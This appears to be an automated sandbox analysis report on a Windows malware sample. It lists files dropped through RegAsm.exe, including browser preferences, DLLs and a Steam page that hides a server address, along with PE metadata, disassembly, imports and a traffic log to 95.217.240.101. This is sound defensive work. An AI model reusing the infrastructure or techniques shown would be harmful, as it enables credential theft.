                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.1358696453229276
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: HaxexQ5EjD.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: 40UAEu1Kpt.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: WcBJX1H1hg.exe, Detection: malicious
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: HaxexQ5EjD.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: 40UAEu1Kpt.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: file.exe, Detection: malicious
                                                                                  • Filename: WcBJX1H1hg.exe, Detection: malicious
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):35643
                                                                                  Entropy (8bit):5.382912586977827
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:s7pqLtWYmwt5D0gqVUiNGAZPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SC:s78LtWYmwt5D0gqVUcZPzzgiJmDzJtxW
                                                                                  MD5:7BCE059CFD60B798CB45C3F4C80B9F6C
                                                                                  SHA1:736FAB76D920E9A5E4BAB9E12E8C85C9D4B22A06
                                                                                  SHA-256:317AB49AEA660F5D325951C5EF280A54F6192D3B31A15B0F985EA292ED159980
                                                                                  SHA-512:B0875CD2B58367D1165D373600CE208B63C4E435A62C237729BB66645A43FC5A6DF16CC646553F97700FA5A7E4C3A5EEE4C7591D7A29E8F87662B815E8A56756
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r8p- https://95.217.240.101|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.c
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2459136
                                                                                  Entropy (8bit):6.052474106868353
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                  MD5:90E744829865D57082A7F452EDC90DE5
                                                                                  SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                  SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                  SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):685392
                                                                                  Entropy (8bit):6.872871740790978
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):608080
                                                                                  Entropy (8bit):6.833616094889818
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):450024
                                                                                  Entropy (8bit):6.673992339875127
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2046288
                                                                                  Entropy (8bit):6.787733948558952
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):257872
                                                                                  Entropy (8bit):6.727482641240852
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):80880
                                                                                  Entropy (8bit):6.920480786566406
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.529756734354945
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:382'976 bytes
                                                                                  MD5:b580ff2d001291bf58bdd23a058ef21b
                                                                                  SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
                                                                                  SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
                                                                                  SHA512:85643ff028ffa0d7c6e7b3dd69c9316aed5e6c15c364bfdb14ec65ca9859ee8fb2ae04e3990c2275671da27abb727a9505f2acf5453a4bb1a3f4df0664df603b
                                                                                  SSDEEP:6144:3hp+scz0+j/2LXudxnOqC3dFxYkBY8EdltIPaiTeUkHjUP6PiLNwETfeuBMbxFr9:3SscQu/CLtF3BY87PFi7HJAwETfhMlF5
                                                                                  TLSH:6684E051B4C1C032D433153A49F4DBB85E7EB9600AA69A9FBB940F7F4F312C1D621A6B
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x4072d9
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows cui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6644F62C [Wed May 15 17:51:40 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:0
                                                                                  File Version Major:6
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:81b834f6f9db0b945bd836f537996a1f
                                                                                  Instruction
                                                                                  call 00007F13E0BBF083h
                                                                                  jmp 00007F13E0BBE759h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                  push esi
                                                                                  mov ecx, dword ptr [eax+3Ch]
                                                                                  add ecx, eax
                                                                                  movzx eax, word ptr [ecx+14h]
                                                                                  lea edx, dword ptr [ecx+18h]
                                                                                  add edx, eax
                                                                                  movzx eax, word ptr [ecx+06h]
                                                                                  imul esi, eax, 28h
                                                                                  add esi, edx
                                                                                  cmp edx, esi
                                                                                  je 00007F13E0BBE8FBh
                                                                                  mov ecx, dword ptr [ebp+0Ch]
                                                                                  cmp ecx, dword ptr [edx+0Ch]
                                                                                  jc 00007F13E0BBE8ECh
                                                                                  mov eax, dword ptr [edx+08h]
                                                                                  add eax, dword ptr [edx+0Ch]
                                                                                  cmp ecx, eax
                                                                                  jc 00007F13E0BBE8EEh
                                                                                  add edx, 28h
                                                                                  cmp edx, esi
                                                                                  jne 00007F13E0BBE8CCh
                                                                                  xor eax, eax
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  ret
                                                                                  mov eax, edx
                                                                                  jmp 00007F13E0BBE8DBh
                                                                                  push esi
                                                                                  call 00007F13E0BBF35Dh
                                                                                  test eax, eax
                                                                                  je 00007F13E0BBE902h
                                                                                  mov eax, dword ptr fs:[00000018h]
                                                                                  mov esi, 0045DB4Ch
                                                                                  mov edx, dword ptr [eax+04h]
                                                                                  jmp 00007F13E0BBE8E6h
                                                                                  cmp edx, eax
                                                                                  je 00007F13E0BBE8F2h
                                                                                  xor eax, eax
                                                                                  mov ecx, edx
                                                                                  lock cmpxchg dword ptr [esi], ecx
                                                                                  test eax, eax
                                                                                  jne 00007F13E0BBE8D2h
                                                                                  xor al, al
                                                                                  pop esi
                                                                                  ret
                                                                                  mov al, 01h
                                                                                  pop esi
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  cmp dword ptr [ebp+08h], 00000000h
                                                                                  jne 00007F13E0BBE8E9h
                                                                                  mov byte ptr [0045DB50h], 00000001h
                                                                                  call 00007F13E0BBEBA7h
                                                                                  call 00007F13E0BC18F0h
                                                                                  test al, al
                                                                                  jne 00007F13E0BBE8E6h
                                                                                  xor al, al
                                                                                  pop ebp
                                                                                  ret
                                                                                  call 00007F13E0BC92C9h
                                                                                  test al, al
                                                                                  jne 00007F13E0BBE8ECh
                                                                                  push 00000000h
                                                                                  call 00007F13E0BC18F7h
                                                                                  pop ecx
                                                                                  jmp 00007F13E0BBE8CBh
                                                                                  mov al, 01h
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  cmp byte ptr [0045DB51h], 00000000h
                                                                                  je 00007F13E0BBE8E6h
                                                                                  mov al, 01h
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x291c8          0x64          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5f000          0x1d14        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x27280          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x271c0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x20000          0x174         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x1e2ab       0x1e400   6aaddd29a7b1d14c04fafe4373874165  False     0.5765996255165289  data       6.591179392915493   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x20000          0x9a58        0x9c00    c0d3af8d875e80d0742331423512f2ce  False     0.3869941907051282  data       4.658571126756863   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x2a000          0x34654       0x33600   2cb86b6c8671c22ce21f5d03dfb1e373  False     0.9822270377128953  data       7.9818411522888875  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x5f000          0x1d14        0x1e00    45d81991a944a5e251cf5f207dbbc2a5  False     0.7373697916666667  data       6.468270351939864   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL           Import
GDI32.dll     GetClipBox
USER32.dll    PostQuitMessage
ADVAPI32.dll  CryptDecrypt
KERNEL32.dll  HeapSize, CreateFileW, VirtualAlloc, WaitForSingleObject, GetModuleHandleA, FreeConsole, CreateThread, GetProcAddress, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, GetCurrentThreadId, CloseHandle, WaitForSingleObjectEx, GetExitCodeThread, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, ReleaseSRWLockExclusive, WakeAllConditionVariable, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetProcessHeap, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                  May 15, 2024 20:35:51.168817997 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.168853998 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.168865919 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.168914080 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.192764997 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192811966 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192836046 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.192854881 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.192898989 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.208177090 CEST49730443192.168.2.423.194.234.100
                                                                                  May 15, 2024 20:35:51.208195925 CEST4434973023.194.234.100192.168.2.4
                                                                                  May 15, 2024 20:35:51.225543976 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.225575924 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.225739956 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.226167917 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.226177931 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.967655897 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.967739105 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972084999 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972090960 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.972296953 CEST4434973195.217.240.101192.168.2.4
                                                                                  May 15, 2024 20:35:51.972352028 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:51.972640991 CEST49731443192.168.2.495.217.240.101
                                                                                  May 15, 2024 20:35:52.020127058 CEST4434973195.217.240.101192.168.2.4
